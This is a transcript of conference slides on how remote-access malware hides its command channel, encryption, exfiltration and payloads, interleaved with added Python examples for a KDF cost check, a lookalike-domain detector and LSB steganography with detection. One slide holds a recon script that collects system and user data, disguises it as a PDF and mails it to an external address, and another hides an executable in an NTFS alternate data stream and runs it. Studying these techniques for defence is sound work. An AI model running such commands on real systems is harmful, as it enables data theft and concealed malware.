CodeStock14: Hiding in Plain Sight

Post on 10-Jun-2015

Transcript of CodeStock14: Hiding in Plain Sight

Hiding in Plain Sight

Presented by Rob Gillen (@argodev)

This work is licensed under a Creative Commons Attribution 4.0 International License.

This talk and related resources are available online: https://github.com/argodev/talks/

Disclaimer

The content of this presentation represents my personal views and thoughts at the present time. I reserve the right to change my views and opinions at any time. This content is not endorsed by, or representative in any way of, my employer, nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.

HTDCS: Helpdesk Ticket Driven Cyber Security

Overview

- RAT Design
- Encryption
- Command/Control (C2)
- AntiVirus
- Behavior

RAT Design

- Exe is dropped via infected page
- Queries web page for commands
- Performs commands if not done previously
- Periodically polls for new commands

Encryption

- Complex encryption is trivial to implement
- PBKDF: scrypt, a sequential memory-hard function
- Many iterations (> 10K)
- Long key lengths

Encryption Example

- Above configuration is custom-hardware resistant
- Takes approximately ¼ second per guess
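The cost argument on the two encryption slides, as an added example (not the talk's code; the slide's own configuration is not in this transcript, so the scrypt and PBKDF2 parameters below are assumptions). It derives a key with both KDFs from Python's standard library, measures the wall-clock cost of a single guess, and turns the slide's "¼ second per guess" figure into the time an exhaustive search of a small keyspace would take.

```python
"""Cost of guessing against a memory-hard KDF (added example, not from the talk)."""
import hashlib
import time

# Parameters are an assumption; the slide's configuration is not in the transcript.
SCRYPT_N = 2 ** 15           # CPU/memory cost, power of two; memory ~ 128 * N * r = 32 MiB
SCRYPT_R = 8
SCRYPT_P = 1
PBKDF2_ITERATIONS = 100_000  # well above the "> 10K" floor on the slide
KEY_LEN = 32                 # 256-bit derived key
SECONDS_PER_YEAR = 365 * 24 * 3600
HAS_SCRYPT = hasattr(hashlib, "scrypt")   # needs an OpenSSL build with scrypt


def derive_key_scrypt(password: bytes, salt: bytes) -> bytes:
    """scrypt: every guess must also pay for the 128*N*r byte work area."""
    return hashlib.scrypt(password, salt=salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P,
                          maxmem=256 * 1024 * 1024, dklen=KEY_LEN)


def derive_key_pbkdf2(password: bytes, salt: bytes) -> bytes:
    """PBKDF2-HMAC-SHA256: cost comes from iteration count only (no memory hardness)."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, PBKDF2_ITERATIONS, dklen=KEY_LEN)


def seconds_per_guess(kdf, password: bytes, salt: bytes, trials: int = 3) -> float:
    """Wall-clock cost of one derivation, i.e. one password guess, averaged over trials."""
    start = time.perf_counter()
    for _ in range(trials):
        kdf(password, salt)
    return (time.perf_counter() - start) / trials


def years_to_exhaust(per_guess_seconds: float, keyspace: int) -> float:
    """Worst-case time to try every candidate at the measured per-guess cost."""
    return per_guess_seconds * keyspace / SECONDS_PER_YEAR


def demo() -> None:
    salt = b"\x00" * 16                       # constructed; use a random salt in practice
    pw = b"correct horse battery staple"      # constructed sample password
    if HAS_SCRYPT:
        cost = seconds_per_guess(derive_key_scrypt, pw, salt)
        print(f"scrypt N={SCRYPT_N} r={SCRYPT_R} p={SCRYPT_P}: {cost:.3f} s per guess")
    cost = seconds_per_guess(derive_key_pbkdf2, pw, salt)
    print(f"PBKDF2 {PBKDF2_ITERATIONS} iterations: {cost:.3f} s per guess")
    # The slide's quarter-second figure against an 8-character lowercase keyspace:
    print(f"26^8 candidates at 0.25 s/guess: {years_to_exhaust(0.25, 26 ** 8):.0f} years")


if __name__ == "__main__":
    demo()
```

Raising N (scrypt) or the iteration count (PBKDF2) slows the legitimate user once per session but slows an attacker on every guess, which is the whole trade the slide is describing; the memory term is what makes scrypt expensive on custom hardware, where PBKDF2's iteration count alone is cheap to parallelise.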

Command/Control

- Use Web2C approach
- Commands are “issued” en masse via normal, benign-looking web pages
- Common ports
- Leverages existing HTML/server constructs

Command Text

ipconfig /all > %APPDATA%\info.txt
net start >> %APPDATA%\info.txt
tasklist /v >> %APPDATA%\info.txt
net user >> %APPDATA%\info.txt
net localgroup administrators >> %APPDATA%\info.txt
netstat -ano >> %APPDATA%\info.txt
net use >> %APPDATA%\info.txt
copy %APPDATA%\info.txt %APPDATA%\output.pdf
del %APPDATA%\info.txt
sendmail %APPDATA%\output.pdf Status Update "Jones, William E. wejones@yourorg.gov" itebaffe-836@yopmail.com smtp.yourorg.gov
del %APPDATA%\output.pdf

Mimic User Behavior: Traffic Rates

- Monitor incoming/outgoing network traffic for X days
- Configure exfiltration to stay within X% of “normal”

C2

- Exponential/randomized stand-down
- Only communicate during periods of activity

Mimic User Behavior: Target URLs

- Monitor outgoing web queries/URLs for X days
- Use similar domain names for malicious traffic
- Append similar/same query strings to malicious requests

Hiding in Logs

v-client-5b.sjc.dropbox.com
snt-re3-9a.sjc.dropbox.com
yn-in-f125.1e100.net
l1.ycs.vip.dcb.yahoo.com
snt-re3-9a.sjc.drpbox.com
ip-69-31-29-228.nlayer.net
a23-47-20-211.deploy.static.akamaitechnologies.com
l3.ycs.vip.dcb.yahoo.com
ir2.fp.vip.bf1.yahoo.com
www.nbcnews.com.edgesuite.net
wac.946A.edgecastcdn.net
a2.twimg.com
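The log slide above makes the point of the "Target URLs" slide: one of those hostnames is not a real Dropbox host, and it sits among entries that look just like it. As an added example (not the speaker's code), the following detector runs two checks over that list, embedded here as constructed sample input: an edit-distance comparison of each registrable domain against an assumed allowlist of domains the organisation already talks to, and a check for hosts whose left-hand labels are copied from a host on a known-good domain in the same log. Taking the last two labels as the registrable domain is a simplification; a real deployment would use the Public Suffix List.

```python
"""Flag hostnames that are near-misses of known-good domains (added example)."""

# Constructed sample: the hostnames from the "Hiding in Logs" slide, one per line.
SAMPLE_LOG = """\
v-client-5b.sjc.dropbox.com
snt-re3-9a.sjc.dropbox.com
yn-in-f125.1e100.net
l1.ycs.vip.dcb.yahoo.com
snt-re3-9a.sjc.drpbox.com
ip-69-31-29-228.nlayer.net
a23-47-20-211.deploy.static.akamaitechnologies.com
l3.ycs.vip.dcb.yahoo.com
ir2.fp.vip.bf1.yahoo.com
www.nbcnews.com.edgesuite.net
wac.946A.edgecastcdn.net
a2.twimg.com
"""

# Assumption: an allowlist built from the organisation's own baseline of normal traffic.
KNOWN_DOMAINS = {"dropbox.com", "1e100.net", "yahoo.com", "nlayer.net",
                 "akamaitechnologies.com", "edgesuite.net", "edgecastcdn.net", "twimg.com"}


def hosts(log_text: str):
    for line in log_text.splitlines():
        host = line.strip()
        if host:
            yield host


def registrable_domain(host: str) -> str:
    """Last two labels; simplification in place of the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def split_host(host: str):
    host = host.lower().rstrip(".")
    dom = registrable_domain(host)
    return host[: -len(dom)].rstrip("."), dom


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute), row-by-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def flag_lookalikes(log_text: str, known, max_distance: int = 2):
    """Hosts whose registrable domain is within max_distance edits of a known domain
    without being that domain. Returns (host, closest_known_domain, distance)."""
    findings = []
    for host in hosts(log_text):
        dom = registrable_domain(host)
        if dom in known:
            continue
        best = min(known, key=lambda k: levenshtein(dom, k))
        distance = levenshtein(dom, best)
        if distance <= max_distance:
            findings.append((host, best, distance))
    return findings


def shared_prefix_findings(log_text: str, known):
    """Hosts on an unknown domain whose left-hand labels also appear on a known-good
    domain in the same log, i.e. a real host name copied onto a lookalike domain."""
    seen = {}
    for host in hosts(log_text):
        prefix, dom = split_host(host)
        if prefix:
            seen.setdefault(prefix, set()).add(dom)
    findings = []
    for host in hosts(log_text):
        prefix, dom = split_host(host)
        if dom in known or not prefix:
            continue
        for twin in sorted(d for d in seen.get(prefix, ()) if d in known):
            findings.append((host, f"{prefix}.{twin}"))
    return findings


if __name__ == "__main__":
    for finding in flag_lookalikes(SAMPLE_LOG, KNOWN_DOMAINS):
        print("lookalike domain:", finding)
    for finding in shared_prefix_findings(SAMPLE_LOG, KNOWN_DOMAINS):
        print("copied host prefix:", finding)
```

Both checks depend on the baseline the "Traffic Rates" and "Target URLs" slides say the attacker is also measuring; the difference is that the defender can compare against the whole allowlist at once, so a domain that is one character off a name the network already uses every day is exactly the kind of entry that should never be "normal".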

Other Hiding Techniques

- Office file content embedding
- Creative location
- Alternate Data Streams
- Least Significant Bit
- Network protocol manipulation

Creative File Locations

Alternate Data Streams

- Feature of NTFS since NT 3.5.1
- Used for metadata and compatibility with other file systems

So What?

#notepad pcast-nitrd-report-2010.pdf:secret.txt

What about this?

#type evil.exe > notepad.exe:evil.exe

#start notepad.exe:evil.exe

Crude Image Stego: LSB

- Least Significant Bit: alter it and encode the message across the LSBs of successive bytes
- Visually imperceptible
- Computationally challenging to detect
- Encryption also an option

LSB: How It Works

Carrier Image

Image data: size 2.1 MB; dimensions 3500 x 2343 px; resolution 300 dpi; bit depth 24 (~8 megapixels)

“Secret” Message: Welcome! Remember, things aren’t always what they seem.

LSB Blow Up
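The embed and extract step behind the "LSB: How It Works" slides, as an added example that is not the speaker's code. It operates on a raw byte buffer standing in for decoded 24-bit pixel data (so it runs without an image library), uses a constructed carrier with a deliberately uneven value histogram in place of the photo, and round-trips the slide's "secret" message. It also adds the check a defender would run, the pairs-of-values chi-square test: writing an encrypted-looking payload sequentially into the LSBs evens out the counts of each (2k, 2k+1) value pair, which is the caveat to the "computationally challenging to detect" bullet.

```python
"""LSB steganography on a raw sample buffer, plus a pairs-of-values chi-square check.
Added example; the carrier is constructed, not the slide's image."""
import random

SLIDE_MESSAGE = b"Welcome! Remember, things aren't always what they seem."


def embed_lsb(carrier: bytes, message: bytes) -> bytes:
    """Write a 32-bit length header then the message, one bit per carrier byte."""
    payload = len(message).to_bytes(4, "big") + message
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(carrier):
        raise ValueError("carrier too small for payload")
    out = bytearray(carrier)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit    # only the lowest bit ever changes
    return bytes(out)


def extract_lsb(stego: bytes) -> bytes:
    """Read the header, then that many bytes, from the LSBs in order."""
    def read_bits(start: int, count: int) -> int:
        value = 0
        for i in range(count):
            value = (value << 1) | (stego[start + i] & 1)
        return value

    length = read_bits(0, 32)
    if 32 + 8 * length > len(stego):
        raise ValueError("no valid payload header")
    return bytes(read_bits(32 + 8 * k, 8) for k in range(length))


def max_sample_delta(a: bytes, b: bytes) -> int:
    """Largest per-sample change; 1 for LSB embedding, hence 'visually imperceptible'."""
    return max(abs(x - y) for x, y in zip(a, b))


def pov_chi_square(samples: bytes) -> float:
    """Pairs-of-values statistic. Untouched data leaves counts of value 2k and 2k+1
    unequal; LSB replacement with random-looking bits drives them toward equal,
    so a small value over a sequentially written region is suspicious."""
    counts = [0] * 256
    for s in samples:
        counts[s] += 1
    stat = 0.0
    for k in range(128):
        even, odd = counts[2 * k], counts[2 * k + 1]
        expected = (even + odd) / 2
        if expected:
            stat += (even - expected) ** 2 / expected
    return stat


def synthetic_carrier(n_bytes: int, seed: int = 7) -> bytes:
    """Constructed carrier: bias LSBs toward 0 so value pairs are unbalanced, a stand-in
    for the uneven histogram of a real photograph."""
    rng = random.Random(seed)
    out = bytearray()
    for _ in range(n_bytes):
        value = rng.randint(0, 255)
        if rng.random() < 0.8:
            value &= 0xFE
        out.append(value)
    return bytes(out)


def roundtrip_slide_message() -> bytes:
    return extract_lsb(embed_lsb(synthetic_carrier(4096), SLIDE_MESSAGE))


def chi_square_before_after(seed: int = 7):
    """Fill a carrier completely with a random payload (what an encrypted message looks
    like) and return the statistic for the clean and the stego buffer."""
    carrier = synthetic_carrier(32_000, seed)
    rng = random.Random(seed + 1)
    payload = bytes(rng.getrandbits(8) for _ in range(3996))   # 8 * (4 + 3996) == 32_000
    stego = embed_lsb(carrier, payload)
    return pov_chi_square(carrier), pov_chi_square(stego)


if __name__ == "__main__":
    print(roundtrip_slide_message().decode())
    before, after = chi_square_before_after()
    print(f"chi-square clean: {before:.0f}   stego: {after:.0f}")
```

The statistic collapses only over the region that was actually written, which is why the attack notes on the slides (encrypt the payload, spread it through "various bytes" rather than writing it sequentially from the first pixel) matter to both sides: a scattered, small payload in an 8-megapixel carrier leaves the global histogram almost untouched, and the detector then needs a much smarter sample than the whole image.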

Network Protocol Abuse

Challenges of Signature-Based Tools

Next Steps

- Know what you can and can’t see
- Consider the implications of your monitoring strategy
- Behavior *must* play a role

Questions/Contact

Rob Gillen
rob@gillenfamily.net
http://rob.gillenfamily.net
@argodev

This talk and related resources are available online: https://github.com/argodev/talks/